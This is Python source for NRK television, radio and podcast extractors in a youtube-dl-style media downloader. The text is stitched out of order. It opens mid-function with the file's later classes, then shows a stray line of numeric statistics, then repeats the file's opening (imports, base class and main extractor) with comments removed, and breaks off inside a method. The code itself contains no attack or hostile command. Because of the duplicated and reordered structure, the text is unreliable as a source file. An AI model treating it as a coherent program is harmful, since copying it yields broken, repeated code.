msg=MESSAGES.get("ProgramIsGeoBlocked"), countries=self._GEO_COUNTRIES
)
message = data.get("endUserMessage") or MESSAGES.get(message_type, message_type)
raise ExtractorError("%s said: %s" % (self.IE_NAME, message), expected=True)
def _call_api(self, path, video_id, item=None, note=None, fatal=True, query=None):
return self._download_json(
urljoin("https://psapi.nrk.no/", path),
video_id,
note or "Downloading %s JSON" % item,
fatal=fatal,
query=query,
headers={"Accept-Encoding": "gzip, deflate, br"},
)
class NRKIE(NRKBaseIE):
_VALID_URL = r"""(?x)
(?:
nrk:|
https?://
(?:
(?:www\.)?nrk\.no/video/(?:PS\*|[^_]+_)|
v8[-.]psapi\.nrk\.no/mediaelement/
)
)
(?P<id>[^?\#&]+)
"""
_TESTS = [
{
# video
"url": "http://www.nrk.no/video/PS*150533",
"md5": "f46be075326e23ad0e524edfcb06aeb6",
"info_dict": {
"id": "150533",
"ext": "mp4",
"title": "Dompap og andre fugler i Piip-Show",
"description": "md5:d9261ba34c43b61c812cb6b0269a5c8f",
"duration": 262,
},
},
{
# audio
"url": "http://www.nrk.no/video/PS*154915",
# MD5 is unstable
"info_dict": {
"id": "154915",
"ext": "mp4",
"title": "Slik høres internett ut når du er blind",
"description": "md5:a621f5cc1bd75c8d5104cb048c6b8568",
"duration": 20,
},
},
{
"url": "nrk:ecc1b952-96dc-4a98-81b9-5296dc7a98d9",
"only_matching": True,
},
{
"url": "nrk:clip/7707d5a3-ebe7-434a-87d5-a3ebe7a34a70",
"only_matching": True,
},
{
"url": "https://v8-psapi.nrk.no/mediaelement/ecc1b952-96dc-4a98-81b9-5296dc7a98d9",
"only_matching": True,
},
{
"url": "https://www.nrk.no/video/dompap-og-andre-fugler-i-piip-show_150533",
"only_matching": True,
},
{
"url": "https://www.nrk.no/video/humor/kommentatorboksen-reiser-til-sjos_d1fda11f-a4ad-437a-a374-0398bc84e999",
"only_matching": True,
},
{
# podcast
"url": "nrk:l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "nrk:podcast/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
# clip
"url": "nrk:150533",
"only_matching": True,
},
{
"url": "nrk:clip/150533",
"only_matching": True,
},
{
# program
"url": "nrk:MDDP12000117",
"only_matching": True,
},
{
"url": "nrk:program/ENRK10100318",
"only_matching": True,
},
{
# direkte
"url": "nrk:nrk1",
"only_matching": True,
},
{
"url": "nrk:channel/nrk1",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url).split("/")[-1]
path_templ = "playback/%s/" + video_id
def call_playback_api(item, query=None):
return self._call_api(path_templ % item, video_id, item, query=query)
# known values for preferredCdn: akamai, iponly, minicdn and telenor
manifest = call_playback_api("manifest", {"preferredCdn": "akamai"})
video_id = try_get(manifest, lambda x: x["id"], compat_str) or video_id
if manifest.get("playability") == "nonPlayable":
self._raise_error(manifest["nonPlayable"])
playable = manifest["playable"]
formats = []
for asset in playable["assets"]:
if not isinstance(asset, dict):
continue
if asset.get("encrypted"):
continue
format_url = url_or_none(asset.get("url"))
if not format_url:
continue
asset_format = (asset.get("format") or "").lower()
if asset_format == "hls" or determine_ext(format_url) == "m3u8":
formats.extend(self._extract_nrk_formats(format_url, video_id))
elif asset_format == "mp3":
formats.append(
{
"url": format_url,
"format_id": asset_format,
"vcodec": "none",
}
)
self._sort_formats(formats)
data = call_playback_api("metadata")
preplay = data["preplay"]
titles = preplay["titles"]
title = titles["title"]
alt_title = titles.get("subtitle")
description = preplay.get("description")
duration = parse_duration(playable.get("duration")) or parse_duration(
data.get("duration")
)
thumbnails = []
for image in try_get(preplay, lambda x: x["poster"]["images"], list) or []:
if not isinstance(image, dict):
continue
image_url = url_or_none(image.get("url"))
if not image_url:
continue
thumbnails.append(
{
"url": image_url,
"width": int_or_none(image.get("pixelWidth")),
"height": int_or_none(image.get("pixelHeight")),
}
)
subtitles = {}
for sub in try_get(playable, lambda x: x["subtitles"], list) or []:
if not isinstance(sub, dict):
continue
sub_url = url_or_none(sub.get("webVtt"))
if not sub_url:
continue
sub_key = str_or_none(sub.get("language")) or "nb"
sub_type = str_or_none(sub.get("type"))
if sub_type:
sub_key += "-%s" % sub_type
subtitles.setdefault(sub_key, []).append(
{
"url": sub_url,
}
)
legal_age = try_get(
data, lambda x: x["legalAge"]["body"]["rating"]["code"], compat_str
)
# https://en.wikipedia.org/wiki/Norwegian_Media_Authority
age_limit = None
if legal_age:
if legal_age == "A":
age_limit = 0
elif legal_age.isdigit():
age_limit = int_or_none(legal_age)
is_series = try_get(data, lambda x: x["_links"]["series"]["name"]) == "series"
info = {
"id": video_id,
"title": title,
"alt_title": alt_title,
"description": description,
"duration": duration,
"thumbnails": thumbnails,
"age_limit": age_limit,
"formats": formats,
"subtitles": subtitles,
}
if is_series:
series = season_id = season_number = episode = episode_number = None
programs = self._call_api(
"programs/%s" % video_id, video_id, "programs", fatal=False
)
if programs and isinstance(programs, dict):
series = str_or_none(programs.get("seriesTitle"))
season_id = str_or_none(programs.get("seasonId"))
season_number = int_or_none(programs.get("seasonNumber"))
episode = str_or_none(programs.get("episodeTitle"))
episode_number = int_or_none(programs.get("episodeNumber"))
if not series:
series = title
if alt_title:
title += " - %s" % alt_title
if not season_number:
season_number = int_or_none(
self._search_regex(
r"Sesong\s+(\d+)",
description or "",
"season number",
default=None,
)
)
if not episode:
episode = alt_title if is_series else None
if not episode_number:
episode_number = int_or_none(
self._search_regex(
r"^(\d+)\.", episode or "", "episode number", default=None
)
)
if not episode_number:
episode_number = int_or_none(
self._search_regex(
r"\((\d+)\s*:\s*\d+\)",
description or "",
"episode number",
default=None,
)
)
info.update(
{
"title": title,
"series": series,
"season_id": season_id,
"season_number": season_number,
"episode": episode,
"episode_number": episode_number,
}
)
return info
class NRKTVIE(InfoExtractor):
IE_DESC = "NRK TV and NRK Radio"
_EPISODE_RE = r"(?P<id>[a-zA-Z]{4}\d{8})"
_VALID_URL = r"https?://(?:tv|radio)\.nrk(?:super)?\.no/(?:[^/]+/)*%s" % _EPISODE_RE
_TESTS = [
{
"url": "https://tv.nrk.no/program/MDDP12000117",
"md5": "c4a5960f1b00b40d47db65c1064e0ab1",
"info_dict": {
"id": "MDDP12000117",
"ext": "mp4",
"title": "Alarm Trolltunga",
"description": "md5:46923a6e6510eefcce23d5ef2a58f2ce",
"duration": 2223.44,
"age_limit": 6,
"subtitles": {
"nb-nor": [
{
"ext": "vtt",
}
],
"nb-ttv": [
{
"ext": "vtt",
}
],
},
},
},
{
"url": "https://tv.nrk.no/serie/20-spoersmaal-tv/MUHH48000314/23-05-2014",
"md5": "8d40dab61cea8ab0114e090b029a0565",
"info_dict": {
"id": "MUHH48000314",
"ext": "mp4",
"title": "20 spørsmål - 23. mai 2014",
"alt_title": "23. mai 2014",
"description": "md5:bdea103bc35494c143c6a9acdd84887a",
"duration": 1741,
"series": "20 spørsmål",
"episode": "23. mai 2014",
"age_limit": 0,
},
},
{
"url": "https://tv.nrk.no/program/mdfp15000514",
"info_dict": {
"id": "MDFP15000514",
"ext": "mp4",
"title": "Kunnskapskanalen - Grunnlovsjubiléet - Stor ståhei for ingenting",
"description": "md5:89290c5ccde1b3a24bb8050ab67fe1db",
"duration": 4605.08,
"series": "Kunnskapskanalen",
"episode": "Grunnlovsjubiléet - Stor ståhei for ingenting",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
},
{
# single playlist video
"url": "https://tv.nrk.no/serie/tour-de-ski/MSPO40010515/06-01-2015#del=2",
"info_dict": {
"id": "MSPO40010515",
"ext": "mp4",
"title": "Sprint fri teknikk, kvinner og menn 06.01.2015",
"description": "md5:c03aba1e917561eface5214020551b7a",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
"expected_warnings": ["Failed to download m3u8 information"],
"skip": "particular part is not supported currently",
},
{
"url": "https://tv.nrk.no/serie/tour-de-ski/MSPO40010515/06-01-2015",
"info_dict": {
"id": "MSPO40010515",
"ext": "mp4",
"title": "Sprint fri teknikk, kvinner og menn 06.01.2015",
"description": "md5:c03aba1e917561eface5214020551b7a",
"age_limit": 0,
},
"expected_warnings": ["Failed to download m3u8 information"],
"skip": "Ikke tilgjengelig utenfor Norge",
},
{
"url": "https://tv.nrk.no/serie/anno/KMTE50001317/sesong-3/episode-13",
"info_dict": {
"id": "KMTE50001317",
"ext": "mp4",
"title": "Anno - 13. episode",
"description": "md5:11d9613661a8dbe6f9bef54e3a4cbbfa",
"duration": 2340,
"series": "Anno",
"episode": "13. episode",
"season_number": 3,
"episode_number": 13,
"age_limit": 0,
},
"params": {
"skip_download": True,
},
},
{
"url": "https://tv.nrk.no/serie/nytt-paa-nytt/MUHH46000317/27-01-2017",
"info_dict": {
"id": "MUHH46000317",
"ext": "mp4",
"title": "Nytt på Nytt 27.01.2017",
"description": "md5:5358d6388fba0ea6f0b6d11c48b9eb4b",
"duration": 1796,
"series": "Nytt på nytt",
"episode": "27.01.2017",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
"skip": "ProgramRightsHasExpired",
},
{
"url": "https://radio.nrk.no/serie/dagsnytt/NPUB21019315/12-07-2015#",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/lindmo/2018/MUHU11006318/avspiller",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/serie/dagsnytt/sesong/201507/NPUB21019315",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
return self.url_result(
"nrk:%s" % video_id, ie=NRKIE.ie_key(), video_id=video_id
)
class NRKTVEpisodeIE(InfoExtractor):
_VALID_URL = r"https?://tv\.nrk\.no/serie/(?P<id>[^/]+/sesong/(?P<season_number>\d+)/episode/(?P<episode_number>\d+))"
_TESTS = [
{
"url": "https://tv.nrk.no/serie/hellums-kro/sesong/1/episode/2",
"info_dict": {
"id": "MUHH36005220",
"ext": "mp4",
"title": "Hellums kro - 2. Kro, krig og kjærlighet",
"description": "md5:ad92ddffc04cea8ce14b415deef81787",
"duration": 1563.92,
"series": "Hellums kro",
"season_number": 1,
"episode_number": 2,
"episode": "2. Kro, krig og kjærlighet",
"age_limit": 6,
},
"params": {
"skip_download": True,
},
},
{
"url": "https://tv.nrk.no/serie/backstage/sesong/1/episode/8",
"info_dict": {
"id": "MSUI14000816",
"ext": "mp4",
"title": "Backstage - 8. episode",
"description": "md5:de6ca5d5a2d56849e4021f2bf2850df4",
"duration": 1320,
"series": "Backstage",
"season_number": 1,
"episode_number": 8,
"episode": "8. episode",
"age_limit": 0,
},
"params": {
"skip_download": True,
},
"skip": "ProgramRightsHasExpired",
},
]
def _real_extract(self, url):
display_id, season_number, episode_number = re.match(
self._VALID_URL, url
).groups()
webpage = self._download_webpage(url, display_id)
info = self._search_json_ld(webpage, display_id, default={})
nrk_id = (
info.get("@id")
or self._html_search_meta("nrk:program-id", webpage, default=None)
or self._search_regex(
r'data-program-id=["\'](%s)' % NRKTVIE._EPISODE_RE, webpage, "nrk id"
)
)
assert re.match(NRKTVIE._EPISODE_RE, nrk_id)
info.update(
{
"_type": "url",
"id": nrk_id,
"url": "nrk:%s" % nrk_id,
"ie_key": NRKIE.ie_key(),
"season_number": int(season_number),
"episode_number": int(episode_number),
}
)
return info
class NRKTVSerieBaseIE(NRKBaseIE):
def _extract_entries(self, entry_list):
if not isinstance(entry_list, list):
return []
entries = []
for episode in entry_list:
nrk_id = episode.get("prfId") or episode.get("episodeId")
if not nrk_id or not isinstance(nrk_id, compat_str):
continue
entries.append(
self.url_result("nrk:%s" % nrk_id, ie=NRKIE.ie_key(), video_id=nrk_id)
)
return entries
_ASSETS_KEYS = (
"episodes",
"instalments",
)
def _extract_assets_key(self, embedded):
for asset_key in self._ASSETS_KEYS:
if embedded.get(asset_key):
return asset_key
@staticmethod
def _catalog_name(serie_kind):
return "podcast" if serie_kind in ("podcast", "podkast") else "series"
def _entries(self, data, display_id):
for page_num in itertools.count(1):
embedded = data.get("_embedded") or data
if not isinstance(embedded, dict):
break
assets_key = self._extract_assets_key(embedded)
if not assets_key:
break
# Extract entries
entries = try_get(
embedded,
(
lambda x: x[assets_key]["_embedded"][assets_key],
lambda x: x[assets_key],
),
list,
)
for e in self._extract_entries(entries):
yield e
# Find next URL
next_url_path = try_get(
data,
(
lambda x: x["_links"]["next"]["href"],
lambda x: x["_embedded"][assets_key]["_links"]["next"]["href"],
),
compat_str,
)
if not next_url_path:
break
data = self._call_api(
next_url_path,
display_id,
note="Downloading %s JSON page %d" % (assets_key, page_num),
fatal=False,
)
if not data:
break
class NRKTVSeasonIE(NRKTVSerieBaseIE):
_VALID_URL = r"""(?x)
https?://
(?P<domain>tv|radio)\.nrk\.no/
(?P<serie_kind>serie|pod[ck]ast)/
(?P<serie>[^/]+)/
(?:
(?:sesong/)?(?P<id>\d+)|
sesong/(?P<id_2>[^/?#&]+)
)
"""
_TESTS = [
{
"url": "https://tv.nrk.no/serie/backstage/sesong/1",
"info_dict": {
"id": "backstage/1",
"title": "Sesong 1",
},
"playlist_mincount": 30,
},
{
# no /sesong/ in path
"url": "https://tv.nrk.no/serie/lindmo/2016",
"info_dict": {
"id": "lindmo/2016",
"title": "2016",
},
"playlist_mincount": 29,
},
{
# weird nested _embedded in catalog JSON response
"url": "https://radio.nrk.no/serie/dickie-dick-dickens/sesong/1",
"info_dict": {
"id": "dickie-dick-dickens/1",
"title": "Sesong 1",
},
"playlist_mincount": 11,
},
{
# 841 entries, multi page
"url": "https://radio.nrk.no/serie/dagsnytt/sesong/201509",
"info_dict": {
"id": "dagsnytt/201509",
"title": "September 2015",
},
"playlist_mincount": 841,
},
{
# 180 entries, single page
"url": "https://tv.nrk.no/serie/spangas/sesong/1",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/hele_historien/sesong/diagnose-kverulant",
"info_dict": {
"id": "hele_historien/diagnose-kverulant",
"title": "Diagnose kverulant",
},
"playlist_mincount": 3,
},
{
"url": "https://radio.nrk.no/podkast/loerdagsraadet/sesong/202101",
"only_matching": True,
},
]
@classmethod
def suitable(cls, url):
return (
False
if NRKTVIE.suitable(url)
or NRKTVEpisodeIE.suitable(url)
or NRKRadioPodkastIE.suitable(url)
else super(NRKTVSeasonIE, cls).suitable(url)
)
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
domain = mobj.group("domain")
serie_kind = mobj.group("serie_kind")
serie = mobj.group("serie")
season_id = mobj.group("id") or mobj.group("id_2")
display_id = "%s/%s" % (serie, season_id)
data = self._call_api(
"%s/catalog/%s/%s/seasons/%s"
% (domain, self._catalog_name(serie_kind), serie, season_id),
display_id,
"season",
query={"pageSize": 50},
)
title = try_get(data, lambda x: x["titles"]["title"], compat_str) or display_id
return self.playlist_result(self._entries(data, display_id), display_id, title)
class NRKTVSeriesIE(NRKTVSerieBaseIE):
_VALID_URL = r"https?://(?P<domain>(?:tv|radio)\.nrk|(?:tv\.)?nrksuper)\.no/(?P<serie_kind>serie|pod[ck]ast)/(?P<id>[^/]+)"
_TESTS = [
{
# new layout, instalments
"url": "https://tv.nrk.no/serie/groenn-glede",
"info_dict": {
"id": "groenn-glede",
"title": "Grønn glede",
"description": "md5:7576e92ae7f65da6993cf90ee29e4608",
},
"playlist_mincount": 90,
},
{
# new layout, instalments, more entries
"url": "https://tv.nrk.no/serie/lindmo",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/blank",
"info_dict": {
"id": "blank",
"title": "Blank",
"description": "md5:7664b4e7e77dc6810cd3bca367c25b6e",
},
"playlist_mincount": 30,
},
{
# new layout, seasons
"url": "https://tv.nrk.no/serie/backstage",
"info_dict": {
"id": "backstage",
"title": "Backstage",
"description": "md5:63692ceb96813d9a207e9910483d948b",
},
"playlist_mincount": 60,
},
{
# old layout
"url": "https://tv.nrksuper.no/serie/labyrint",
"info_dict": {
"id": "labyrint",
"title": "Labyrint",
"description": "I Daidalos sin undersjøiske Labyrint venter spennende oppgaver, skumle robotskapninger og slim.",
},
"playlist_mincount": 3,
},
{
"url": "https://tv.nrk.no/serie/broedrene-dal-og-spektralsteinene",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/saving-the-human-race",
"only_matching": True,
},
{
"url": "https://tv.nrk.no/serie/postmann-pat",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/serie/dickie-dick-dickens",
"info_dict": {
"id": "dickie-dick-dickens",
"title": "Dickie Dick Dickens",
"description": "md5:19e67411ffe57f7dce08a943d7a0b91f",
},
"playlist_mincount": 8,
},
{
"url": "https://nrksuper.no/serie/labyrint",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers",
"info_dict": {
"id": "ulrikkes_univers",
},
"playlist_mincount": 10,
},
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers/nrkno-poddkast-26588-134079-05042018030000",
"only_matching": True,
},
]
@classmethod
def suitable(cls, url):
return (
False
if any(
ie.suitable(url)
for ie in (NRKTVIE, NRKTVEpisodeIE, NRKRadioPodkastIE, NRKTVSeasonIE)
)
else super(NRKTVSeriesIE, cls).suitable(url)
)
def _real_extract(self, url):
site, serie_kind, series_id = re.match(self._VALID_URL, url).groups()
is_radio = site == "radio.nrk"
domain = "radio" if is_radio else "tv"
size_prefix = "p" if is_radio else "embeddedInstalmentsP"
series = self._call_api(
"%s/catalog/%s/%s" % (domain, self._catalog_name(serie_kind), series_id),
series_id,
"serie",
query={size_prefix + "ageSize": 50},
)
titles = (
try_get(
series,
[
lambda x: x["titles"],
lambda x: x[x["type"]]["titles"],
lambda x: x[x["seriesType"]]["titles"],
],
)
or {}
)
entries = []
entries.extend(self._entries(series, series_id))
embedded = series.get("_embedded") or {}
linked_seasons = try_get(series, lambda x: x["_links"]["seasons"]) or []
embedded_seasons = embedded.get("seasons") or []
if len(linked_seasons) > len(embedded_seasons):
for season in linked_seasons:
season_url = urljoin(url, season.get("href"))
if not season_url:
season_name = season.get("name")
if season_name and isinstance(season_name, compat_str):
season_url = "https://%s.nrk.no/serie/%s/sesong/%s" % (
domain,
series_id,
season_name,
)
if season_url:
entries.append(
self.url_result(
season_url,
ie=NRKTVSeasonIE.ie_key(),
video_title=season.get("title"),
)
)
else:
for season in embedded_seasons:
entries.extend(self._entries(season, series_id))
entries.extend(self._entries(embedded.get("extraMaterial") or {}, series_id))
return self.playlist_result(
entries, series_id, titles.get("title"), titles.get("subtitle")
)
class NRKTVDirekteIE(NRKTVIE):
IE_DESC = "NRK TV Direkte and NRK Radio Direkte"
_VALID_URL = r"https?://(?:tv|radio)\.nrk\.no/direkte/(?P<id>[^/?#&]+)"
_TESTS = [
{
"url": "https://tv.nrk.no/direkte/nrk1",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/direkte/p1_oslo_akershus",
"only_matching": True,
},
]
class NRKRadioPodkastIE(InfoExtractor):
_VALID_URL = r"https?://radio\.nrk\.no/pod[ck]ast/(?:[^/]+/)+(?P<id>l_[\da-f]{8}-[\da-f]{4}-[\da-f]{4}-[\da-f]{4}-[\da-f]{12})"
_TESTS = [
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"md5": "8d40dab61cea8ab0114e090b029a0565",
"info_dict": {
"id": "MUHH48000314AA",
"ext": "mp4",
"title": "20 spørsmål 23.05.2014",
"description": "md5:bdea103bc35494c143c6a9acdd84887a",
"duration": 1741,
"series": "20 spørsmål",
"episode": "23.05.2014",
},
},
{
"url": "https://radio.nrk.no/podcast/ulrikkes_univers/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/ulrikkes_univers/sesong/1/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "https://radio.nrk.no/podkast/hele_historien/sesong/bortfoert-i-bergen/l_774d1a2c-7aa7-4965-8d1a-2c7aa7d9652c",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
return self.url_result(
"nrk:%s" % video_id, ie=NRKIE.ie_key(), video_id=video_id
)
class NRKPlaylistBaseIE(InfoExtractor):
def _extract_description(self, webpage):
pass
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
entries = [
self.url_result("nrk:%s" % video_id, NRKIE.ie_key())
for video_id in re.findall(self._ITEM_RE, webpage)
]
playlist_title = self._extract_title(webpage)
playlist_description = self._extract_description(webpage)
return self.playlist_result(
entries, playlist_id, playlist_title, playlist_description
)
class NRKPlaylistIE(NRKPlaylistBaseIE):
_VALID_URL = r"https?://(?:www\.)?nrk\.no/(?!video|skole)(?:[^/]+/)+(?P<id>[^/]+)"
_ITEM_RE = r'class="[^"]*\brich\b[^"]*"[^>]+data-video-id="([^"]+)"'
_TESTS = [
{
"url": "http://www.nrk.no/troms/gjenopplev-den-historiske-solformorkelsen-1.12270763",
"info_dict": {
"id": "gjenopplev-den-historiske-solformorkelsen-1.12270763",
"title": "Gjenopplev den historiske solformørkelsen",
"description": "md5:c2df8ea3bac5654a26fc2834a542feed",
},
"playlist_count": 2,
},
{
"url": "http://www.nrk.no/kultur/bok/rivertonprisen-til-karin-fossum-1.12266449",
"info_dict": {
"id": "rivertonprisen-til-karin-fossum-1.12266449",
"title": "Rivertonprisen til Karin Fossum",
"description": "Første kvinne på 15 år til å vinne krimlitteraturprisen.",
},
"playlist_count": 2,
},
]
def _extract_title(self, webpage):
return self._og_search_title(webpage, fatal=False)
def _extract_description(self, webpage):
return self._og_search_description(webpage)
class NRKTVEpisodesIE(NRKPlaylistBaseIE):
_VALID_URL = r"https?://tv\.nrk\.no/program/[Ee]pisodes/[^/]+/(?P<id>\d+)"
_ITEM_RE = r'data-episode=["\']%s' % NRKTVIE._EPISODE_RE
_TESTS = [
{
"url": "https://tv.nrk.no/program/episodes/nytt-paa-nytt/69031",
"info_dict": {
"id": "69031",
"title": "Nytt på nytt, sesong: 201210",
},
"playlist_count": 4,
}
]
def _extract_title(self, webpage):
return self._html_search_regex(
r"<h1>([^<]+)</h1>", webpage, "title", fatal=False
)
class NRKSkoleIE(InfoExtractor):
IE_DESC = "NRK Skole"
_VALID_URL = r"https?://(?:www\.)?nrk\.no/skole/?\?.*\bmediaId=(?P<id>\d+)"
_TESTS = [
{
"url": "https://www.nrk.no/skole/?page=search&q=&mediaId=14099",
"md5": "18c12c3d071953c3bf8d54ef6b2587b7",
"info_dict": {
"id": "6021",
"ext": "mp4",
"title": "Genetikk og eneggede tvillinger",
"description": "md5:3aca25dcf38ec30f0363428d2b265f8d",
"duration": 399,
},
},
{
"url": "https://www.nrk.no/skole/?page=objectives&subject=naturfag&objective=K15114&mediaId=19355",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url)
nrk_id = self._download_json(
"https://nrkno-skole-prod.kube.nrk.no/skole/api/media/%s" % video_id,
video_id,
)["psId"]
return self.url_result("nrk:%s" % nrk_id)
| 34.63778
| 131
| 0.47865
|
from __future__ import unicode_literals
import itertools
import random
import re
from ..compat import compat_str
from ..utils import (ExtractorError, determine_ext, int_or_none,
parse_duration, str_or_none, try_get, url_or_none,
urljoin)
from .common import InfoExtractor
class NRKBaseIE(InfoExtractor):
_GEO_COUNTRIES = ["NO"]
_CDN_REPL_REGEX = r"""(?x)://
(?:
nrkod\d{1,2}-httpcache0-47115-cacheod0\.dna\.ip-only\.net/47115-cacheod0|
nrk-od-no\.telenorcdn\.net|
minicdn-od\.nrk\.no/od/nrkhd-osl-rr\.netwerk\.no/no
)/"""
def _extract_nrk_formats(self, asset_url, video_id):
if re.match(r"https?://[^/]+\.akamaihd\.net/i/", asset_url):
return self._extract_akamai_formats(asset_url, video_id)
asset_url = re.sub(r"(?:bw_(?:low|high)=\d+|no_audio_only)&?", "", asset_url)
formats = self._extract_m3u8_formats(
asset_url, video_id, "mp4", "m3u8_native", fatal=False
)
if not formats and re.search(self._CDN_REPL_REGEX, asset_url):
formats = self._extract_m3u8_formats(
re.sub(
self._CDN_REPL_REGEX,
"://nrk-od-%02d.akamaized.net/no/" % random.randint(0, 99),
asset_url,
),
video_id,
"mp4",
"m3u8_native",
fatal=False,
)
return formats
def _raise_error(self, data):
MESSAGES = {
"ProgramRightsAreNotReady": "Du kan dessverre ikke se eller høre programmet",
"ProgramRightsHasExpired": "Programmet har gått ut",
"NoProgramRights": "Ikke tilgjengelig",
"ProgramIsGeoBlocked": "NRK har ikke rettigheter til å vise dette programmet utenfor Norge",
}
message_type = data.get("messageType", "")
if (
"IsGeoBlocked" in message_type
or try_get(data, lambda x: x["usageRights"]["isGeoBlocked"]) is True
):
self.raise_geo_restricted(
msg=MESSAGES.get("ProgramIsGeoBlocked"), countries=self._GEO_COUNTRIES
)
message = data.get("endUserMessage") or MESSAGES.get(message_type, message_type)
raise ExtractorError("%s said: %s" % (self.IE_NAME, message), expected=True)
def _call_api(self, path, video_id, item=None, note=None, fatal=True, query=None):
return self._download_json(
urljoin("https://psapi.nrk.no/", path),
video_id,
note or "Downloading %s JSON" % item,
fatal=fatal,
query=query,
headers={"Accept-Encoding": "gzip, deflate, br"},
)
class NRKIE(NRKBaseIE):
_VALID_URL = r"""(?x)
(?:
nrk:|
https?://
(?:
(?:www\.)?nrk\.no/video/(?:PS\*|[^_]+_)|
v8[-.]psapi\.nrk\.no/mediaelement/
)
)
(?P<id>[^?\#&]+)
"""
_TESTS = [
{
"url": "http://www.nrk.no/video/PS*150533",
"md5": "f46be075326e23ad0e524edfcb06aeb6",
"info_dict": {
"id": "150533",
"ext": "mp4",
"title": "Dompap og andre fugler i Piip-Show",
"description": "md5:d9261ba34c43b61c812cb6b0269a5c8f",
"duration": 262,
},
},
{
"url": "http://www.nrk.no/video/PS*154915",
"info_dict": {
"id": "154915",
"ext": "mp4",
"title": "Slik høres internett ut når du er blind",
"description": "md5:a621f5cc1bd75c8d5104cb048c6b8568",
"duration": 20,
},
},
{
"url": "nrk:ecc1b952-96dc-4a98-81b9-5296dc7a98d9",
"only_matching": True,
},
{
"url": "nrk:clip/7707d5a3-ebe7-434a-87d5-a3ebe7a34a70",
"only_matching": True,
},
{
"url": "https://v8-psapi.nrk.no/mediaelement/ecc1b952-96dc-4a98-81b9-5296dc7a98d9",
"only_matching": True,
},
{
"url": "https://www.nrk.no/video/dompap-og-andre-fugler-i-piip-show_150533",
"only_matching": True,
},
{
"url": "https://www.nrk.no/video/humor/kommentatorboksen-reiser-til-sjos_d1fda11f-a4ad-437a-a374-0398bc84e999",
"only_matching": True,
},
{
"url": "nrk:l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "nrk:podcast/l_96f4f1b0-de54-4e6a-b4f1-b0de54fe6af8",
"only_matching": True,
},
{
"url": "nrk:150533",
"only_matching": True,
},
{
"url": "nrk:clip/150533",
"only_matching": True,
},
{
"url": "nrk:MDDP12000117",
"only_matching": True,
},
{
"url": "nrk:program/ENRK10100318",
"only_matching": True,
},
{
"url": "nrk:nrk1",
"only_matching": True,
},
{
"url": "nrk:channel/nrk1",
"only_matching": True,
},
]
def _real_extract(self, url):
video_id = self._match_id(url).split("/")[-1]
path_templ = "playback/%s/" + video_id
def call_playback_api(item, query=None):
return self._call_api(path_templ % item, video_id, item, query=query)
manifest = call_playback_api("manifest", {"preferredCdn": "akamai"})
video_id = try_get(manifest, lambda x: x["id"], compat_str) or video_id
if manifest.get("playability") == "nonPlayable":
self._raise_error(manifest["nonPlayable"])
playable = manifest["playable"]
formats = []
for asset in playable["assets"]:
if not isinstance(asset, dict):
continue
if asset.get("encrypted"):
continue
format_url = url_or_none(asset.get("url"))
if not format_url:
continue
asset_format = (asset.get("format") or "").lower()
if asset_format == "hls" or determine_ext(format_url) == "m3u8":
formats.extend(self._extract_nrk_formats(format_url, video_id))
elif asset_format == "mp3":
formats.append(
{
"url": format_url,
"format_id": asset_format,
"vcodec": "none",
}
)
self._sort_formats(formats)
data = call_playback_api("metadata")
preplay = data["preplay"]
titles = preplay["titles"]
title = titles["title"]
alt_title = titles.get("subtitle")
description = preplay.get("description")
duration = parse_duration(playable.get("duration")) or parse_duration(
data.get("duration")
)
thumbnails = []
for image in try_get(preplay, lambda x: x["poster"]["images"], list) or []:
if not isinstance(image, dict):
continue
image_url = url_or_none(image.get("url"))
if not image_url:
continue
thumbnails.append(
{
"url": image_url,
"width": int_or_none(image.get("pixelWidth")),
"height": int_or_none(image.get("pixelHeight")),
}
)
subtitles = {}
for sub in try_get(playable, lambda x: x["subtitles"], list) or []:
if not isinstance(sub, dict):
continue
sub_url = url_or_none(sub.get("webVtt"))
if not sub_url:
continue
sub_key = str_or_none(sub.get("language")) or "nb"
sub_type = str_or_none(sub.get("type"))
if sub_type:
sub_key += "-%s" % sub_type
subtitles.setdefault(sub_key, []).append(
{
"url": sub_url,
}
)
legal_age = try_get(
data, lambda x: x["legalAge"]["body"]["rating"]["code"], compat_str
)
age_limit = None
if legal_age:
if legal_age == "A":
age_limit = 0
elif legal_age.isdigit():
age_limit = int_or_none(legal_age)
is_series = try_get(data, lambda x: x["_links"]["series"]["name"]) == "series"
info = {
"id": video_id,
"title": title,
"alt_title": alt_title,
"description": description,
"duration": duration,
"thumbnails": thumbnails,
"age_limit": age_limit,
"formats": formats,
"subtitles": subtitles,
}
if is_series:
series = season_id = season_number = episode = episode_number = None
programs = self._call_api(
"programs/%s" % video_id, video_id, "programs", fatal=False
)
if programs and isinstance(programs, dict):
series = str_or_none(programs.get("seriesTitle"))
season_id = str_or_none(programs.get("seasonId"))
season_number = int_or_none(programs.get("seasonNumber"))
episode = str_or_none(programs.get("episodeTitle"))
episode_number = int_or_none(programs.get("episodeNumber"))
